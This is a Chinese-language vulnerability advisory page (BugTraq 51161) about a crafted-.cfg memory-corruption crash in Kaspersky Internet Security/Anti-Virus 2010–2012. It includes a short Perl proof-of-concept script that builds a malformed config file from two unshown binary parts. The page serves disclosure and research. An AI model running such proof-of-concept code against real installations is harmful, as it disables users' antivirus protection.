Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Kaspersky Internet Security/Anti-Virus “.cfg”文件处理内存破坏漏洞

发布日期:2011-12-21
更新日期:2011-12-22受影响系统:
Kaspersky Labs Kaspersky Antivirus 2012
Kaspersky Labs Kaspersky Antivirus 2011
Kaspersky Labs Kaspersky Antivirus 2010
Kaspersky Labs Kaspersky Antivirus
Kaspersky Labs Kaspersky Internet Security 2012
Kaspersky Labs Kaspersky Internet Security 2011
Kaspersky Labs Kaspersky Internet Security 2010
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 51161Kaspersky Internet Security套件是一套完整的解决方案,用于保护计算机抵御几乎所有来自互联网的主要的威胁。Kaspersky Antivirus是非常流行的杀毒软件。Kaspersky Internet Security/Anti-Virus在处理特制.cfg文件时存在本地内存破坏漏洞,本地攻击者可利用此漏洞造成受影响应用崩溃,拒绝服务合法用户。<*来源:Benjamin K.M.
  *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Benjamin K.M. ()提供了如下测试方法:http://downloads.securityfocus.com/vulnerabilities/exploits/51161.txtProof of Concept:
=================
The vulnerability can be exploited by local attackers via import or remote attacker via user inter action.
For demonstration or reproduce ...
#!/usr/bin/perl
##############################################################################
my $code="corrupt" x 1;
###################################################################
$FH1 = "file1";
$FilePath1 = "part1.bin";
$FH2 = "file2";
$FilePath2 = "part2.bin";
###################################################################
open(myfile,">> poc_pwn.cfg");
binmode myfile;
###################################################################
open(FH1, $FilePath1);
binmode FH1;
while (<FH1>) {
         print myfile;
      }
close(FH1);
print myfile $code;
open(FH2, $FilePath2);
binmode FH2;
while (<FH2>) {
         print myfile;
      }
close(FH2);
###################################################################
PoC:           
            ../PoC/kis&kav_2011_2012_p0c.pl
            ../PoC/part1.bin
            ../PoC/part2.bin建议:
--------------------------------------------------------------------------------
厂商补丁:Kaspersky Labs
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.kaspersky.com/Winamp多个整数溢出漏洞VLC Media Player “get_chunk_header()”双重释放漏洞相关资讯      漏洞 
  • 快递官网漏洞泄露 1400 万用户信息  (08/12/2014 08:37:42)
  • 要389目录服务器访问绕过漏洞  (10/01/2012 09:18:08)
  • ASUS Net4Switch "ipswcom.dll"   (03/02/2012 09:32:42)
  • 软件漏洞是一笔大买卖!  (10/06/2012 08:28:32)
  • PHPCMS V9.1.13任意文件包含漏洞分  (08/01/2012 07:23:17)
  • Open Handset Alliance Android   (03/01/2012 06:59:34)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图